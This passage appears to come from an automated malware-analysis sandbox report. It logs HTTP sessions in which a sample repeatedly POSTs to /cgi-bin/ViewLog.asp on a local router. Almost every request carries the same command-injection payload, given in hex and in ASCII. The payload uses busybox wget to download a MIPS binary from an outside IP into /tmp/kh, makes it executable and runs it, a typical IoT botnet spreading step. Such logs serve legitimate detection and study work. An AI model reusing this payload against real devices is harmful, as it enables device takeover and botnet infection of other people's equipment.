                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.538568974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              344192.168.2.145484431.136.59.2018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.881382942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:55.044359922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:01.188103914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:13.219583035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.538577080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              345192.168.2.144134431.200.47.2238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.908309937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              346192.168.2.143854094.122.31.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:51.911988020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              347192.168.2.145862062.234.29.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:52.023437023 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              348192.168.2.143760485.193.229.148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.114726067 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              349192.168.2.144294495.86.70.1598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.313714981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              350192.168.2.145377094.120.60.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:53.351171017 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              351192.168.2.145806294.229.247.718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:55.910731077 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:56.231070042 CET391INHTTP/1.1 405 Not Allowed
                                              Server: Web server
                                              Date: Thu, 23 Nov 2023 04:16:55 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 155
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              352192.168.2.145965431.0.100.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:56.869736910 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.180226088 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              353192.168.2.143679685.255.101.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:57.313436031 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:57.975894928 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.236471891 CET1066INHTTP/1.1 302 Found
                                              Date: Thu, 23 Nov 2023 04:16:58 GMT
                                              Server: Apache
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              X-Robots-Tag: none
                                              X-Frame-Options: SAMEORIGIN
                                              X-Download-Options: noopen
                                              X-Permitted-Cross-Domain-Policies: none
                                              Set-Cookie: ockk5faqydlg=f0qj0msuo3ha00n5aqt15sd2uk; path=/; HttpOnly
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: oc_sessionPassphrase=RuK5MRaN9F%2BWqj8pDOClaYvY3VxVVjaI0l8CLPPQl6TNRB1eBWqCuBEjS7k4FparbNNecNFTff%2B2Ia48pGliKwg6BQZocWyTVNPdjgAThBcv1KrPDh97JR%2BH%2F9MbFX7T; path=/; HttpOnly; SameSite=strict
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *
                                              Location: http://192.168.0.14:80/login
                                              Content-Length: 0
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              354192.168.2.143364495.86.110.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:57.360075951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              355192.168.2.145625294.120.5.1888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:57.360146046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              356192.168.2.143337062.34.73.418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:57.762506008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.308229923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:59.364214897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              357192.168.2.143621894.121.115.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:01.197455883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
